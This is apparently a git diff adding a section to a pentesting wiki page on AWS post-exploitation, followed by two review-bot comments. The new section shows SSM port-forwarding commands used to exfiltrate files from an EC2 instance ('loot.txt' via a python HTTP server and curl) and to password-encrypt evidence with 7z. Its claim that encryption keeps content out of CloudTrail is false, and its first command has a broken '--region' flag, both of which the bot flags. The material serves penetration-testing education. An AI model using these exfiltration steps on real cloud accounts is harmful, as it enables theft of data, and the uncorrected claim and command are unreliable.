diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index bfd300c700..7583159afe 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md 
@@ -138,6 +138,54 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls- Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. +--- + +#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession) + +If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required): + +```bash +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8000","localPortNumber"="8000" \ + --region +``` + +The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**. + +Common use cases: + +* **File exfiltration** + 1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate: + + ```bash + python3 -m http.server 8000 + ``` + + 2. From your workstation fetch the files through the SSM tunnel: + + ```bash + curl http://localhost:8000/loot.txt -o loot.txt + ``` + +* **Accessing internal web applications (e.g. Nessus)** + +```bash +# Forward remote Nessus port 8834 to local 8835 +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8834","localPortNumber"="8835" +# Browse to http://localhost:8835 +``` + +Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content: + +```bash +# On the instance +7z a evidence.7z /path/to/files/* -p'Str0ngPass!' +``` + + ### Share AMI ```bash 
@@ -474,6 +522,10 @@ if __name__ == "__main__": main() ``` +## References + +- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/) + {{#include ../../../../banners/hacktricks-training.md}}
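Review bot: The tip at the end of the new port-forwarding section misstates what CloudTrail records. CloudTrail logs the management API call (`ssm:StartSession`, target instance, document name, parameters) and never the bytes that flow through the tunnel, so compressing or encrypting the files has no effect on what CloudTrail captures; please reword the justification (e.g. "to avoid leaving clear-text copies on the instance and on the wire through the HTTP server") or drop it, and if you keep the `7z` line consider adding `-mhe=on` so filenames are encrypted too and noting that the password is visible in shell history and `ps`. Separately, the first command ends in a bare `--region` with no value (`--region \`), which the AWS CLI rejects with "expected one argument"; either drop the flag (the Nessus example omits it) or write it as `--region <region>` to match the placeholder style used for the instance id.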
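Review bot: The new `## References` section is never cited from the text it supports; since the port-forwarding section added earlier in this patch is what the Pentest Partners article describes, add an inline link from that section (for example on the "Quick Local ↔️ Remote Port Forward" heading or the file-exfiltration bullet) so readers can tell which part of the page the reference backs.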